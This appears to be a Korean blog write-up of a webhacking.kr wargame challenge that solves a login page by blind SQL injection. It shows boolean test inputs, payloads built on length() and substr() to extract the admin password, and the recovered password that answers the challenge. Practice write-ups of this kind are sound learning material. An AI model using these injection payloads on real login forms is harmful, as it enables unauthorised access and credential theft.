21번 문제에요.
배점은 250점, 분야는 DB이에요.
딱봐도 BLIND SQL Injection을 하라고 하네요.
guest / guest 를 넣어본 결과?
Result : login success
admin / 1234 를 넣어보면?
Result : login fail
admin' and 1=1# / 1
를 넣어보면?
Result : wrong password
admin' and 2=1# / 1
를 넣어보면?
Result : login fail
이렇게 뜨네요.
구문이 true이고 비밀번호가 맞으면 = 로그인 성공
구문이 true이고 비밀번호가 다르면 = 잘못된 비밀번호
구문이 false이면 = 로그인 실패
인가보네요.
select 를 넣었을때
Result : no hack
가 뜨는걸로 보아 select가 필터링되고있으니
컬럼명을 추측해서 넣어야 되는데 그냥 pw로 해볼게요.
길이 = ?id=admin' and length(pw)=0%23&pw=1
값 : ?id=admin' and substr(pw,1,1)='0'%23&pw=1
로 돌려본 결과?
there_is_no_rest_for_the_white_angel
admin / there_is_no_rest_for_the_white_angel
로 로그인을 시도해보면?
빠밤!
문제가 풀렸네요.
'연구글 > webhacking.kr' 카테고리의 다른 글
| webhacking.kr Challenge(old) 23 / PHP (0) | 2020.08.22 |
|---|---|
| webhacking.kr Challenge(old) 22 / DB + Computing (0) | 2020.08.22 |
| webhacking.kr Challenge(old) 20 / Computing (0) | 2020.08.21 |
| webhacking.kr Challenge(old) 19 / Computing (0) | 2020.08.21 |
| webhacking.kr Challenge(old) 18 / DB (0) | 2020.08.21 |